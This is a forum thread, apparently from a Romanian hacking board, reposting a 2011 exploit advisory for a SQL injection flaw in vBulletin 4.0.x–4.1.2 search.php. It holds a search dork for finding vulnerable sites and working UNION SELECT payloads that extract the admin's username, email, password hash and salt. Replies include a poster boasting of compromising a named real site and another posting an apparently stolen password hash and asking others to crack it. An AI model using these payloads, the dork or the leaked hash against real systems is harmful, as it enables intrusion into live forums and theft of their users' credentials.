Jump to content
Nytro

vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability

Recommended Posts

Posted

vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability

====================================================================
#vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
====================================================================
# #
# 888 d8 888 _ 888 ,d d8 #
# e88~\888 d88 888-~\ 888 e~ ~ 888-~88e ,d888 _d88__ #
# d888 888 d888 888 888d8b 888 888b 888 888 #
# 8888 888 / 888 888 888Y88b 888 8888 888 888 #
# Y888 888 /__888__ 888 888 Y88b 888 888P 888 888 #
# "88_/888 888 888 888 Y88b 888-_88" 888 "88_/ #
# #
====================================================================
#PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#
====================================================================

#[+] Discovered By : D4rkB1t
#[+] Site : NaN
#[+] support e-mail : d4rkb1t@live.com


Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"

--------------------------
# ~Vulnerable Codes~ #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;

--------------------------
# ~Exploit~ #
--------------------------
POST data on "Search Multiple Content Types" => "groups"

&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

More info: http://j0hnx3r.org/?p=818

--------------------------
# ~Advice~ #
--------------------------
Vendor already released a patch on vb#4.1.3.
UPDATE NOW!

====================================================================
# 1337day.com [2011-5-21]
====================================================================

Sursa: vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability

Info: vBulletin® 4.x SQL Injection Vulnerability « J0hn.X3r

E public (thanks "d") de ceva timp, dar vad ca acum apare si pe exploit-db.

Video Demonstration by TinK:

Posted

ba astia nu pot sa se abtina sa nu devina ei faimosi :( au distrus bunatate de exploit. Nu i-am inteles niciodata pe astia ce vor sa publice ei tot si nici macar nu sunt ale lor in marea majoritate a cazurilor.

Posted (edited)

Poftiti o scurta demonstratie facuta de mine pe alphazone.ro acum o luna: Alphazone Pwned on Vimeo

@paul4games: nu , nu el a gasit vulnerabilitatea. Tipul asta care a postat-o pe 1337day si exploit-db e un skid de pe hackforums pe nume majidemo.

Edited by xpaulx
  • Upvote 1
Posted (edited)

baza de date nu o poti lua asa doar dupa ce faci rost de user si parola de la admin si atunci deabea poti sa o furi

edit: reuseste careva sa gaseasca parola?

Leonight : d4644b1f0c83a6686f47cf67215c4fa6

Edited by marcus21

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...